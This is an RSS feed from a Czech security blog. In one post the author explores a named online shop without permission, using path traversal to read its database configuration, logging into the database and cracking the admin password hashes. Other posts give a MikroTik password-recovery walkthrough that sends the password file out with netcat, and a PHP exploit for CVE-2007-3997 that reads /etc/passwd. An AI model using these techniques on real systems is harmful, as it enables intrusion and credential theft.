<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Hodžův blog &#187; Hack/Crack</title>
	<atom:link href="http://hodza.net/category/linux/bezpecnost/hackcrack/feed/" rel="self" type="application/rss+xml" />
	<link>http://hodza.net</link>
	<description>I přestože jsem paranoidní neznamená, že mě nedostanou...</description>
	<lastBuildDate>Mon, 30 Jan 2012 18:02:05 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>České eshopy &#8222;rozdávají&#8220; Vaše data</title>
		<link>http://hodza.net/2008/03/17/ceske-eshopy-rozdavaji-vase-data/</link>
		<comments>http://hodza.net/2008/03/17/ceske-eshopy-rozdavaji-vase-data/#comments</comments>
		<pubDate>Mon, 17 Mar 2008 11:17:03 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Bezpečnost]]></category>
		<category><![CDATA[Hack/Crack]]></category>

		<guid isPermaLink="false">http://hodza.net/2008/03/17/ceske-eshopy-rozdavaji-vase-data/</guid>
		<description><![CDATA[Nakupování v eshopech se u nás stalo celkem běžnou záležitostí. Není se také čemu divit &#8211; ceny bývají oproti kamenným obchodům většinou nesrovnatelné (nesrovnatelně nízké). Zboží si můžeme interaktivně prohlédnout v teple domova, zaplatit převodem přes internet, nechat doručit dobírkou a když se nám nelíbí tak ho zase vrátit. Možná to zní jako pohádka, ale [...]]]></description>
			<content:encoded><![CDATA[<p>Nakupování v eshopech se u nás stalo celkem běžnou záležitostí. Není se také čemu divit &#8211; ceny bývají oproti kamenným obchodům většinou nesrovnatelné (nesrovnatelně nízké). Zboží si můžeme interaktivně prohlédnout v teple domova, zaplatit převodem přes internet, nechat doručit dobírkou a když se nám nelíbí tak ho zase vrátit. Možná to zní jako pohádka, ale to neznamená, že náš příběh bude mít dobrý konec&#8230;<br />
<span id="more-116"></span><br />
Málo kdo si totiž uvědomuje, že se současným vyplněním objednávky v eshopu zanechává svůj &#8222;otisk&#8220;. Eshopy obvykle shromažďují data nezbytně nutná (jako je jméno, adresa či telefon). Nebývá ale vy jímkou, když si uloží také údaje mnohem citlivější &#8211; jako jsou například informace o vaší platební kartě.</p>
<p>V tom lepším případě, by při nabourání obchodu &#8222;hackerem&#8220;, mohlo vyjít najevo, že si každý měsíc po výplatě objednáváte nějakou sprosťárničku v sexshopu. V horším případě útočník zjistí i heslo a bude si tak moct číst vaši soukromou poštu s přítelkyní/milenkou/manželkou neboť do emailu zadáváte stejné heslo jako do eshopu. Pokud chcete slyšet hororové scénáře, pak věřte, že není problém využít uložených informací o vaší kartě a objednat si tak jakékoliv zboží, které ve výsledku ovšem nezaplatí útočník, ale vy z vaší karty.</p>
<p>Stále si myslíte, že se vám to nemůže stát neboť nakupujete pouze v renomovaných a velkých eshopech? Chyba!</p>
<p>Před před více jak týdnem jsem zcela náhodou objevil na <a href="http://www.sitecore.cz/">stránkách</a> jednoho z největších českých prodejců outdoorového vybavení &#8211; firmy Rock point zcela zásadní (a naprosto školáckou) bezpečnostní chybu. Ihned jsem prodejce emailově kontaktoval a problém mu nastínil. Bohužel do dnešního dne jsem neobdržel odpověď a chyba je stále neopravená.</p>
<p>O co jde?</p>
<p>Při hledání dokumentace k jednomu z výrobků jsem narazil na následující odkaz:</p>
<p><a href="http://www.rockpoint.cz/download.php?soubor=soubory/seznam_odberatelu_NET.xls" title="http://www.rockpoint.cz/download.php?soubor=soubory/seznam_odberatelu_NET.xls">http://www.rockpoint.cz/download.php?soubor=soubory/seznam_odberatelu_NET.xls</a></p>
<p>Nebývá zrovna zvykem, že by prodejce uveřejňoval seznam svých odběratelů. To ve mě vyvolalo pocit, že tato <a href="http://www.sitecore.cz/">stránka</a> měla být před zraky zákazníků ukryta. Začal jsem přemýšlet, co by se stalo, kdybych zadal jako parametr jiný soubor než je seznam_odberatelu_NET.xls. Po chvíli jsem tedy do adresního řádku zadal následující adresu:</p>
<p><a href="http://www.rockpoint.cz/download.php?soubor=soubory/../index.php" title="http://www.rockpoint.cz/download.php?soubor=soubory/../index.php">http://www.rockpoint.cz/download.php?soubor=soubory/../index.php</a></p>
<p>Při čemž &#8222;index.php&#8220; bývá &#8222;startovací <a href="http://www.sitecore.cz/">stránkou</a>&#8220; webu a řetězec &#8222;../&#8220; značí, že se jedná o nadřazený adresář.<br />
To co se stalo mi téměř vyrazilo dech. Zobrazila se mi totiž opravdu zdrojová <a href="http://www.sitecore.cz/">stránka</a> souboru index.php. Opravdu bych nečekal, že u tak velkého prodejce narazím na tak kritickou chybu.</p>
<p>Ze zvědavosti jsem stejným způsobem procházel všechny ostatní soubory na serveru, až jsem došel k následujícímu:</p>
<p><a href="http://www.rockpoint.cz/download.php?soubor=inc/conf_databaze.php" title="http://www.rockpoint.cz/download.php?soubor=inc/conf_databaze.php">http://www.rockpoint.cz/download.php?soubor=inc/conf_databaze.php</a></p>
<p>Tento soubor (jak je již patrné z názvu) obsahuje data potřebná pro připojení k My SQL databázi.<br />
Tím ovšem má zvědavost neskončila. Rozhodl jsem se výsledek ověřit.</p>
<p>V konfiguračním souboru je uveden jako My SQL host &#8222;uvdb4.globe.cz&#8220;. Vzdálený přístup k této databázi sice není povolen, ale to mě nemohlo odradit. Po chvíli hledání jsem zjistil, že se jedná o server, který je provozován v rámci hostingu Active 24. Na stejnojmenných <a href="http://www.sitecore.cz/">stránkách</a> jsem pak v sekci podpora našel odkaz k PHPMyAdminovi, který umožňuje spravovat My SQL databáze pomocí web prohlížeče. Kliknul jsem na link a zadal přihlašovací údaje. Nemohlo následovat nic jiného, než úspěšné přihlášení. Přede mnou byl kompletní seznam všech výrobků, uživatelů, objednávek a seznamů prodejen. V podstatě bych v této chvíli mohl eshop plně ovládnout, ale mě zajímala poslední neprozkoumaná věc &#8211; administrativní sekce obchodu.</p>
<p>Administrační sekci nebylo zase tak těžké najít. Kupodivu se nacházela na url:</p>
<p><a href="http://www.rockpoint.cz/admin/" title="http://www.rockpoint.cz/admin/">http://www.rockpoint.cz/admin/</a></p>
<p>Nahlédl jsem zpět do tabulky administrátorů, abych zjistil přihlašovací jméno a heslo. Zde byla alespoň nějaká snaha o zabezpečení &#8211; heslo bylo zakódováno pomocí algoritmu MD5. Bohužel tento algoritmus je už dnes &#8222;překonaný&#8220;. heslo prvního administrátora jsem tak &#8222;rozlouskl&#8220; díky jeho jednoduchosti přes jednu z online HASH databází. Heslo druhého administrátora bylo sice složitější, ovšem pod útokem rainbow tabulek bylo  později prolomeno také. Oba účty jsem ještě otestoval &#8211; byly funkční. Tím má &#8222;práce&#8220; skončila.</p>
<p>Výše uvedený text nenabádá k zneužití popsané chyby. Text byl sepsán z důvodu laxního přístupu administrátorů danných <a href="http://www.sitecore.cz/">stránek</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://hodza.net/2008/03/17/ceske-eshopy-rozdavaji-vase-data/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Chráněno: Hacked gallery &#8211; 11.3.2008</title>
		<link>http://hodza.net/2008/03/11/hacked-gallery-1132008/</link>
		<comments>http://hodza.net/2008/03/11/hacked-gallery-1132008/#comments</comments>
		<pubDate>Tue, 11 Mar 2008 10:46:01 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Bezpečnost]]></category>
		<category><![CDATA[Hack/Crack]]></category>

		<guid isPermaLink="false">http://hodza.net/2008/03/11/hacked-gallery-1132008/</guid>
		<description><![CDATA[Stručný obsah příspěvku zde není uveden, protože je tento příspěvek chráněn heslem.]]></description>
			<content:encoded><![CDATA[<form action="http://hodza.net/wp-pass.php" method="post">
<p>Tento příspěvek je chráněn heslem. Pokud ho chcete zobrazit, zadejte prosím heslo:</p>
<p><label for="pwbox-106">Heslo:<br />
<input name="post_password" id="pwbox-106" type="password" size="20" /></label><br />
<input type="submit" name="Submit" value="Potvrdit" /></p></form>
]]></content:encoded>
			<wfw:commentRss>http://hodza.net/2008/03/11/hacked-gallery-1132008/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Chráněno: Hacked gallery &#8211; 7.3.2008</title>
		<link>http://hodza.net/2008/03/07/hacked-gallery/</link>
		<comments>http://hodza.net/2008/03/07/hacked-gallery/#comments</comments>
		<pubDate>Fri, 07 Mar 2008 08:28:55 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Bezpečnost]]></category>
		<category><![CDATA[Hack/Crack]]></category>

		<guid isPermaLink="false">http://hodza.net/2008/03/07/hacked-gallery/</guid>
		<description><![CDATA[Stručný obsah příspěvku zde není uveden, protože je tento příspěvek chráněn heslem.]]></description>
			<content:encoded><![CDATA[<form action="http://hodza.net/wp-pass.php" method="post">
<p>Tento příspěvek je chráněn heslem. Pokud ho chcete zobrazit, zadejte prosím heslo:</p>
<p><label for="pwbox-81">Heslo:<br />
<input name="post_password" id="pwbox-81" type="password" size="20" /></label><br />
<input type="submit" name="Submit" value="Potvrdit" /></p></form>
]]></content:encoded>
			<wfw:commentRss>http://hodza.net/2008/03/07/hacked-gallery/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Mikrotik password recovery aneb zapomenuté heslo &#8211; žádný problém</title>
		<link>http://hodza.net/2008/02/13/mikrotik-password-recovery-aneb-zapomenute-heslo-zadny-problem/</link>
		<comments>http://hodza.net/2008/02/13/mikrotik-password-recovery-aneb-zapomenute-heslo-zadny-problem/#comments</comments>
		<pubDate>Wed, 13 Feb 2008 11:43:01 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Bezpečnost]]></category>
		<category><![CDATA[Distribuce]]></category>
		<category><![CDATA[Hack/Crack]]></category>
		<category><![CDATA[Hardware]]></category>
		<category><![CDATA[Mikrotik]]></category>

		<guid isPermaLink="false">http://hodza.net/2008/02/13/mikrotik-password-recovery-aneb-zapomenute-heslo-zadny-problem/</guid>
		<description><![CDATA[Přináším Vám postup, jak se lehce z Kubuntu Linuxu dostaneme k zapomenutému heslu na routerboardu se systémem Mikrotik.
1. Zapojíme USB-&#62;COM redukci. U mě se redukce namapuje na ttyUSB0 &#8211; viz hláška z dmesg
[ 8446.216000] usb 1-1: pl2303 converter now attached to ttyUSB0
2. Nainstalujeme TFTP server
# sudo apt-get install atftpd

3. Opravíme konfiguraci démona xinet přidáním parametru [...]]]></description>
			<content:encoded><![CDATA[<p>Přináším Vám postup, jak se lehce z Kubuntu Linuxu dostaneme k zapomenutému heslu na routerboardu se systémem Mikrotik.</p>
<p>1. Zapojíme USB-&gt;COM redukci. U mě se redukce namapuje na ttyUSB0 &#8211; viz hláška z dmesg</p>
<p><code>[ 8446.216000] usb 1-1: pl2303 converter now attached to ttyUSB0</code></p>
<p>2. Nainstalujeme TFTP server<br />
<code># sudo apt-get install atftpd</code></p>
<p><span id="more-80"></span></p>
<p>3. Opravíme konfiguraci démona xinet přidáním parametru &#8222;-inetd_compat&#8220;<br />
<code># sudo vi /etc/default/xinetd</code><br />
<code>XINETD_OPTS="-stayalive -inetd_compat"</code></p>
<p>4. Nahrajeme alternativní kernel s podporou yaffs2 do adresáře /tftpboot</p>
<p>5. Nainstalujeme DHCP server<br />
<code># sudo apt-get install dhcp3-server</code></p>
<p>6. Nastavíme parametry DHCP serveru<br />
<code># sudo vi /etc/dhcp3/dhcpd.conf</code><br />
<code>default-lease-time 21600;<br />
max-lease-time 43200;<br />
option domain-name-servers 10.0.0.1;<br />
option netbios-name-servers 10.0.0.1;<br />
option netbios-node-type 8;<br />
option www-server 10.0.0.1;<br />
authoritative;<br />
allow booting;<br />
allow bootp;</code></p>
<p><code>subnet 10.0.0.0 netmask 255.255.255.0<br />
{<br />
option routers 10.0.0.1;<br />
option subnet-mask 255.255.255.0;<br />
option broadcast-address 10.0.0.255;<br />
filename "/tftpboot/linuxrc";<br />
range 10.0.0.10 10.0.0.100;<br />
}</code></p>
<p>7. Nastavíme IP adresu na našem síťovém rozhraní, spustíme DHCP a TFTP server<br />
<code>sudo ifconfig eth0 down<br />
sudo ifconfig eth0 10.0.0.1 up<br />
sudo /etc/init.d/xinetd restart<br />
sudo /etc/init.d/dhcp3-server start</code></p>
<p>8. Spustíme konfiguraci minicomu<br />
<code># minimcom -s</code></p>
<p>Vybereme položku &#8222;Nastavení sériového portu&#8220; a nastavíme následující parametry:</p>
<p><code>A - Sériové zařízení           : /dev/ttyUSB0<br />
B - Umístění zámku             : /var/lock<br />
C - Program pro příchozí volání:<br />
D - Program pro odchozí volání :<br />
E - Bps/Par/Bity               : 115200 8N1<br />
F - Hardwarová kontrola toku   : Ano<br />
G - Softwarová kontrola toku   : Ne</code></p>
<p>Připojíme kabel do Mikrotiku<br />
Mělo by se zobrazit:<br />
<code>MikroTik 2.9.46<br />
MikroTik Login:</code></p>
<p>Rebootujeme Mikrotik</p>
<p>Zobrazí se:<br />
<code>RouterBOOT booter 2.10<br />
RouterBoard 532A<br />
CPU frequency: 399 MHz<br />
Memory size:  64 MB<br />
Press any key within 2 seconds to enter setup.</code></p>
<p>Zmáčkneme libovolnou klávesu dříve, než vyprší interval.</p>
<p>Zobrazí se:<br />
<code>RouterBOOT-2.10<br />
What do you want to configure?<br />
d - boot delay<br />
k - boot key<br />
s - serial console<br />
o - boot device<br />
u - cpu mode<br />
f - try cpu frequency<br />
c - keep cpu frequency<br />
r - reset configuration<br />
e - format nand<br />
g - upgrade firmware<br />
i - board info<br />
p - boot protocol<br />
t - do memory testing<br />
x - exit setup<br />
your choice:</code></p>
<p>Vyberme &#8222;o&#8220; pro volbu &#8222;boot device&#8220;.</p>
<p>Zobrazí se:<br />
<code>Select boot device:<br />
e - boot over Ethernet<br />
* n - boot from NAND, if fail then Ethernet<br />
c - boot from CompactFlash only<br />
1 - boot Ethernet once, then NAND<br />
2 - boot Ethernet once, then CompactFlash<br />
o - boot from NAND only<br />
b - boot chosen device<br />
your choice:</code></p>
<p>Vybereme &#8222;1&#8243; pro boot z Ethernetu (a následně NAND)</p>
<p>Zobrazí se:<br />
<code>RouterBOOT-2.10<br />
What do you want to configure?<br />
d - boot delay<br />
k - boot key<br />
s - serial console<br />
o - boot device<br />
u - cpu mode<br />
f - try cpu frequency<br />
c - keep cpu frequency<br />
r - reset configuration<br />
e - format nand<br />
g - upgrade firmware<br />
i - board info<br />
p - boot protocol<br />
t - do memory testing<br />
x - exit setup<br />
your choice:</code></p>
<p>Vybereme &#8222;p&#8220; pro &#8222;boot protocol&#8220;.</p>
<p>Zobrazí se:<br />
<code>Choose which boot protocol to use:<br />
1 - bootp protocol<br />
* 2 - dhcp protocol<br />
your choice:</code></p>
<p>Vybereme &#8222;2&#8243; pro &#8222;dhcp&#8220; protocol&#8220;</p>
<p>Zobrazí se nám opět úvodní menu<br />
<code>What do you want to configure?<br />
d - boot delay<br />
k - boot key<br />
s - serial console<br />
o - boot device<br />
u - cpu mode<br />
f - try cpu frequency<br />
c - keep cpu frequency<br />
r - reset configuration<br />
e - format nand<br />
g - upgrade firmware<br />
i - board info<br />
p - boot protocol<br />
t - do memory testing<br />
x - exit setup<br />
your choice:</code></p>
<p>Vybereme &#8222;x&#8220; pro uložení a opuštění setupu. Mikrotik se znovu rebootuje.</p>
<p>Nyní by se měl načíst nový kernel &#8211; v mém případě z opravené distribuce OpenWrt<br />
<code>BusyBox v1.4.2 (2008-01-15 11:43:12 CET) Built-in shell (ash)<br />
Enter 'help' for a list of built-in commands.<br />
_______                     ________        __<br />
|       |.-----.-----.-----.|  |  |  |.----.|  |_<br />
|   -   ||  _  |  -__|     ||  |  |  ||   _||   _|<br />
|_______||   __|_____|__|__||________||__|  |____|<br />
|__| W I R E L E S S   F R E E D O M<br />
KAMIKAZE (7.09) -----------------------------------<br />
* 10 oz Vodka       Shake well with ice and strain<br />
* 10 oz Triple sec  mixture into 10 shot glasses.<br />
* 10 oz lime juice  Salute!<br />
---------------------------------------------------<br />
root@OpenWrt:/#</code></p>
<p>Vypíšeme si jednotlivé blokové zařízení<br />
<code>#cat /proc/mtd</code><br />
<code>dev:    size   erasesize  name<br />
mtd0: 00400000 00004000 "RouterBoard NAND Boot"<br />
mtd1: 03c00000 00004000 "RouterBoard NAND Main"</code></p>
<p>Připojíme filesystém na kterém jsou uložena hesla<br />
<code># mount -t yaffs2 -o ro /dev/mtdblock1 /mnt</code></p>
<p>Na PC si spustíme netcat s následujícími parametry<br />
<code>sudo /bin/netcat -l -p 666 &gt; user.dat</code></p>
<p>Na mikrotiku zobrazíme soubor s hesly a přes netcat ho pošleme do PC<br />
<code>cat /mnt/nova/store/user.dat|nc 10.0.0.1 666</code></p>
<p>Na PX spustíme nástroj na lámání hesel<br />
<code># ./mtpass user.dat</code><br />
<code>mtpass v0.2 - MikroTik RouterOS password recovery tool<br />
Reading file user.dat, 213 bytes long<br />
Rec# | Username        | Password           | Disable flag   | User comment<br />
--------------------------------------------------------------------------------------------<br />
1    | admin           | mojeheslo          |                | system default user</code></p>
<p>Návod vychází z informací na stránkách <a title="Mikrotik password recovery" href="http://manio.skyboo.net/mikrotik/">http://manio.skyboo.net/mikrotik/</a><br />
Autor neručí za případné škody při použití tohoto návodu.</p>
]]></content:encoded>
			<wfw:commentRss>http://hodza.net/2008/02/13/mikrotik-password-recovery-aneb-zapomenute-heslo-zadny-problem/feed/</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>PHP</title>
		<link>http://hodza.net/2007/10/15/php/</link>
		<comments>http://hodza.net/2007/10/15/php/#comments</comments>
		<pubDate>Mon, 15 Oct 2007 11:10:05 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Bezpečnost]]></category>
		<category><![CDATA[Hack/Crack]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[MySQL]]></category>

		<guid isPermaLink="false">http://hodza.net/?p=23</guid>
		<description><![CDATA[První díl, ze &#8222;seriálu o bezpečnosti&#8220;, aneb tuníme náš server&#8230;

Vztahuje se k:
&#60; = PHP 5.2.3
&#60;= PHP 4.4.7
CVE:
CVE-2007-3997
Problém:
Díky rozšířením MySQL a MySQLi v PHP lze obejít bezpečnostní politiku safe_mode.
Detail:
Pomocí funkce MySQL LOCAL INFILE lze získat libovolný soubor ze systému.
Řešení:
1) Kompilovat MySQL klienta s parametrem &#8222;&#8211;disable-local-infile&#8220;
- nepomůže při použití MySQLi, neboť volba se dá znovu povolit příkazem [...]]]></description>
			<content:encoded><![CDATA[<p>První díl, ze &#8222;seriálu o bezpečnosti&#8220;, aneb tuníme náš server&#8230;</p>
<p><span id="more-23"></span></p>
<p><strong>Vztahuje se k:</strong><br />
&lt; = PHP 5.2.3<br />
&lt;= PHP 4.4.7</p>
<p><strong>CVE:</strong><br />
CVE-2007-3997</p>
<p><strong>Problém:</strong><br />
Díky rozšířením MySQL a MySQLi v PHP lze obejít bezpečnostní politiku safe_mode.</p>
<p><strong>Detail:</strong><br />
Pomocí funkce MySQL LOCAL INFILE lze získat libovolný soubor ze systému.</p>
<p><strong>Řešení:</strong><br />
1) Kompilovat MySQL klienta s parametrem &#8222;&#8211;disable-local-infile&#8220;<br />
- nepomůže při použití MySQLi, neboť volba se dá znovu povolit příkazem &#8222;mysqli-&gt;options(MYSQLI_OPT_LOCAL_INFILE, 1);&#8220;<br />
2) Do konfiguračního souboru (/etc/mysql/my.cnf) vložit (do sekce [mysqld]) &#8222;set-variable=local-infile=0&#8243;.</p>
<p><strong>Exploit:</strong><br />
function r($fp, &amp;$buf, $len, &amp;$err) {print fread($fp, $len);}<br />
$m = new mysqli(&#8216;localhost&#8217;, &#8216;aaaa&#8217;, &#8220;, &#8216;a&#8217;);<br />
$m-&gt;options(MYSQLI_OPT_LOCAL_INFILE, 1);<br />
$m-&gt;set_local_infile_handler(&#8222;r&#8220;);<br />
$m-&gt;query(&#8222;LOAD DATA LOCAL INFILE &#8216;/etc/passwd&#8217; INTO TABLE a.a&#8220;);<br />
$m-&gt;close();</p>
]]></content:encoded>
			<wfw:commentRss>http://hodza.net/2007/10/15/php/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
	</channel>
</rss>

